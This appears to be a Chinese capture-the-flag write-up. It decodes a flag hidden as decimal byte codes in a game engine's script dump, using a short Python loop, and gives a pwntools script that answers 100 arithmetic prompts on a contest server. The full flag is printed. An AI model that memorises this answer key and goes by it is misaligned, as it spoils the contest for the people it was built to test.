main_90@act_cstand^id@048#name@067078083083#face@049#x@049051048#y@049051048#loc@^^main_91@act_se^^^0^^057048045048 main_91@act_se^filename@121117107117109111095048048049057046109112051#vol@056048048^^main_93@act_dialog^^^0^^057049045048 main_93@act_dialog^^^main_95@act_se^^^0^^229143175231136177231154132229165179229173169058227128142228184141229143175228187165229144172228187150231158142232175180229147166227128130227128143013010035048 main_95@act_se^filename@121117107117109111095048048050048046109112051#vol@056048048^^main_97@act_dialog^^^0^^057053045048 main_97@act_dialog^^^main_99@act_se^^^0^^083104105110111058227128142231187191232137178229184189229173144239188140228184128229164180231153189229143145239188140231156139232181183230157165229190136229143175231136177046046046046046033033033033227128143013010035048 main_99@act_se^filename@121117107117109111095048048050049046109112051#vol@056048048^^main_101@act_dialog^^^0^^057057045048 main_101@act_dialog^^^main_103@act_se^^^0^^083104105110111058227128142233154190233129147228189160229176177230152175226128148226128148227128143013010035048 main_103@act_se^filename@121117107117109111095048048050050046109112051#vol@056048048^^main_105@act_dialog^^^0^^049048051045048 main_105@act_dialog^^^main_107@act_se^^^0^^083104105110111058227128142228184150231149140231172172228184128229143175231136177231154132032067078083083032229168152239188129227128143013010035048 main_107@act_se^filename@121117107117109111095048048050052046109112051#vol@056048048^^main_109@act_dialog^^^0^^049048055045048 main_109@act_dialog^^^main_111@act_se^^^0^^229143175231136177231154132229165179229173169058227128142230152175231154132239188140230136145229176177230152175032067078083083032229168152229147166227128130227128143013010035048 main_111@act_se^filename@121117107117109111095048048050053046109112051#vol@056048048^^main_113@act_dialog^^^0^^049049049045048 main_113@act_dialog^^^main_115@act_se^^^0^^067078083083032229168152058227128142230136145228187172229135157232129154231189145231187156229174137229133168229183165228189156229174164230172162232191142230175143228184128228189141229175185231189145231187156229174137229133168230136150229188128229143145232191144231187180230132159229133180232182163231154132230150176231148159229138155233135143229138160229133165239188129227128143013010035048 main_115@act_se^filename@121117107117109111095048048050054046109112051#vol@056048048^^main_117@act_dialog^^^0^^049049053045048 main_117@act_dialog^^^main_119@act_se^^^0^^067078083083032229168152058227128142229185182228184141230152175228187128228185136229143175230128149231154132233130170230149153231187132231187135229147166239188129227128143013010035048 main_119@act_se^filename@121117107117109111095048048050055046109112051#vol@056048048^^main_121@act_dialog^^^0^^049049057045048 main_121@act_dialog^^^main_123@act_se^^^0^^067078083083032229168152058227128142232175180228186134232191153228185136229164154239188140229133182229174158228189160230160185230156172228184141229156168230132143230136145228187172229134153228186134228187128228185136229137167230156172239188140228189160229133179229191131231154132229143170230156137032102108097103032229175185229144167239188129227128143013010035048 main_123@act_se^filename@121117107117109111095048048050056046109112051#vol@056048048^^main_125@act_dialog^^^0^^049050051045048 main_125@act_dialog^^^main_127@act_se^^^0^^067078083083032229168152058227128142230136145232191153229176177229145138232175137228189160229147166239188129227128143013010035048 main_127@act_se^filename@121117107117109111095048048050057046109112051#vol@056048048^^main_129@act_dialog^^^0^^049050055045048 main_129@act_dialog^^^main_131@act_deletecstand^^^0^^083104105110111058227128142229165185230173163229156168230130132230130132230139137232191145229146140230136145231154132232183157231166187046046046229165189231180167229188160239188129227128143013010035048 main_131@act_deletecstand^id@048^^main_132@act_picture^^^0^^049051049045048 main_132@act_picture^id@048#filename@067078083083095112110103046112110103#x@053048048#y@051048048#opacity@049#xscale@049046051#yscale@049046051#ro@048^^main_133@act_se^^^0^^049051050045048 main_133@act_se^filename@121117107117109111095048048051048046109112051#vol@056048048^^main_135@act_dialog^^^0^^049051051045048 main_135@act_dialog^^^main_137@act_se^^^0^^083104105110111058227128142230157165229136176229175185232175157230161134229137141233157162228186134239188129227128143013010035048 main_137@act_se^filename@121117107117109111095048048051049046109112051#vol@056048048^^main_139@act_dialog^^^0^^049051055045048 main_139@act_dialog^^^main_142@act_dialog^^^0^^067078083083032229168152058227128142102108097103229176177230152175226128148226128148239188129102108097103230152175099110115115123087048119033089048117095052114101095075049110103095048102095082051086051051115051051095033033033033033033125229147166239188129232174176228189143228186134229144151239188159227128143013010035049 main_142@act_dialog^^^main_144@act_deletepicture^^^0^^067078083083032229168152058227128142229191171229142187230143144228186164229144167239188129227128143013010035048 main_144@act_deletepicture^id@048^^main_145@act_se^^^0^^049052052045048 main_145@act_se^filename@121117107117109111095048048051050046109112051#vol@056048048^^main_147@act_dialog^^^0^^049052053045048 main_147@act_dialog^^^main_150@act_dialog^^^0^^083104105110111058227128142046046046046231173137231173137239188140229165185232175180228186134229149165239188159227128143013010035049 main_150@act_dialog^^^main_152@act_shutdown^^^0^^045045084072069032069078068045045013010035048 main_152@act_shutdown^^^^^^0^^049053050045048 main_155@act_function^sign@114099108105099107040041^^^main_157@act_endfunction^^1^^049053053045048 main_157@act_endfunction^^^^^^0^^049053055045048
然后去官方的技术文档那搜索了一下
1 符号“@”表示当前行是可执行命令,Action是命令名称,ParameterName是命令参数的名字,ParameterValueExpression是要赋值给等号左侧参数的表达式,省略号表示一个命令既可以没有<参数, 值>对,也可以有多个<参数, 值>对。注意到,一个命令如果带有多个参数时,参数是没有先后顺序要求的;而符号“#”表明当前行是注释,编译器在做语法分析时将略过它;推导符号Dialog代表在游戏执行过程中要显示的文本,这是AVG游戏使用频率最高的命令,由于文本的显示存在跨行的情况,因此它以一种上下文有关文法来表示
Dialog是文本框相关的,然后这些数字也有规律三个一组的像ascii码一样的,然后尝试搜cnss{的ascii码099110115115123搜到了,把后面的字符串拷贝下来然后python三个三个读拿到flag cnss{W0w!Y0u_4re_K1ng_0f_R3V33s33_!!!!!!}
1 2 3 s = "099110115115123087048119033089048117095052114101095075049110103095048102095082051086051051115051051095033033033033033033125229147166239188129232174176228189143228186134229144151239188159227128143013010035049" for i in range (0 ,len (s),3 ): print (chr (int (s[i:i+3 ])),end="" )
pwn 🎮 nc,启动 nc连
😡 让我访问!!! pwntools
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 from pwn import *import rehost,port = "43.156.14.141" ,1141 p = remote(host,port) p.recvuntil(b"(y/n)\n" ) p.sendline(b"y" ) p.recvuntil(b"(y/n)\n" ) p.sendline(b"y" ) for i in range (100 ): string = p.recvline().decode('utf-8' ) n1,operator,n2 = re.findall(r'(\d+|\+|\-|\*|\/)' , string) n1,n2 = int (n1),int (n2) if operator == "+" : tmp = str (n1 + n2) p.sendline(tmp.encode('utf-8' )) continue else : tmp = str (n1 - n2) p.sendline(tmp.encode('utf-8' )) continue while 1 : ss = input () p.sendline(ss.encode('utf-8' )) print (p.recvline())
👀 你的名字
